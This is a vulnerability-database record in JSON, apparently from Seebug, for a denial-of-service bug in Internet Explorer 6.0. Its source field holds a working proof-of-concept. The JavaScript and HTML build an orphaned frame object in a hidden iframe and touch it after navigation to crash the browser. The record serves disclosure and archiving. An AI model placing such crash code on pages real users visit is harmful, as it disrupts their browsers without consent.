Description
No description provided by source.
{"lastseen": "2017-11-19T16:45:01", "modified": "2014-07-01T00:00:00", "description": "No description provided by source.", "cvss": {"score": 0.0, "vector": "NONE"}, "published": "2014-07-01T00:00:00", "status": "cve,poc", "enchantments": {"score": {"value": 0.0, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.0}, "href": "https://www.seebug.org/vuldb/ssvid-81874", "references": [], "enchantments_done": [], "id": "SSV:81874", "title": "Microsoft Internet Explorer 6.0 Deleted Frame Object Denial of Service Vulnerability", "bulletinFamily": "exploit", "reporter": "Root", "cvelist": [], "viewCount": 3, "sourceData": "\n source: http://www.securityfocus.com/bid/19228/info\r\n\r\nMicrosoft Internet Explorer is prone to a denial-of-service vulnerability. This issue is triggered when an attacker convinces a victim user to visit a malicious website.\r\n\r\nRemote attackers may exploit this issue to crash Internet Explorer, effectively denying service to legitimate users.\r\n\r\n// MoBB Demo\r\n\t\t\t// Provided by Aviv Raff\r\n\t\t\t// http://aviv.raffon.net/\r\n\t\t\t\r\n var orphanObject;\r\n\r\n function createOrphanObject() {\r\n orphanObject=document.frames["emptyFrame"].document.getElementById("emptyObject").object.parentWindow.document.createElement("frame");\r\n document.frames["emptyFrame"].location.href="about:blank";\r\n window.setTimeout('crashBrowser()',1);\r\n }\r\n\r\n function crashBrowser() {\r\n orphanObject.frameBorder="whateveryoulike";\r\n }\r\n\r\n function insertEmptyObject() {\r\n return '<OBJECT id="emptyObject" data="nonexist.html" type="text/html"></OBJECT>';\r\n }\r\n \r\n \r\n <iframe id="emptyFrame" src="javascript:parent.insertEmptyObject()" style="display:none"></iframe>\r\n \r\n Clicking the button below may crash your browser!<br><br>\r\n <input type='button' onClick='createOrphanObject()' value='Start Demo!'>\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-81874", "type": "seebug", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1647683627, "score": 1659785532, "epss": 1678850553}}
{}